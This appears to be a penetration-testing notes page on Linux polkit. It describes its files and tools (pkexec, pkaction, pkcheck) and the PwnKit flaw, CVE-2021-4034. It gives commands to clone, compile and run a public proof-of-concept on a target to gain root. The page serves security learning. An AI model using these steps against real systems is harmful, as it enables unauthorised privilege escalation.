Skip to content

Polkit

PolicyKit (polkit) is an authorization service on Linux-based operating systems that allows user software and system components to communicate with each other if the user software is authorized to do so. To check whether the user software is authorized for this instruction, polkit is asked.

Polkit works with two groups of files.

  1. actions/policies (/usr/share/polkit-1/actions)
  2. rules (/usr/share/polkit-1/rules.d)

Polkit also has local authority rules which can be used to set or remove additional permissions for users and groups. Custom rules can be placed in the directory /etc/polkit-1/localauthority/50-local.d with the file extension .pkla.

PolKit also comes with three additional programs:

  • pkexec - runs a program with the rights of another user or with root rights
  • pkaction - can be used to display actions
  • pkcheck - this can be used to check if a process is authorized for a specific action

The most interesting tool for us, in this case, is pkexec because it performs the same task as sudo and can run a program with the rights of another user or root.

1
2
3
pkexec -u <user> <command>
# Example:
# pkexec -u root id

CVE-2021-4034: Pwnkit

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

To exploit this vulnerability, we need to download a PoC (https://github.com/arthepsy/CVE-2021-4034) and compile it on the target system itself or a copy we have made.

1
2
3
git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034
gcc cve-2021-4034-poc.c -o poc

Move the poc file to the target machine and execute it to escalate privileges.

Last update: 2025-02-23
Created: February 23, 2025 12:06:38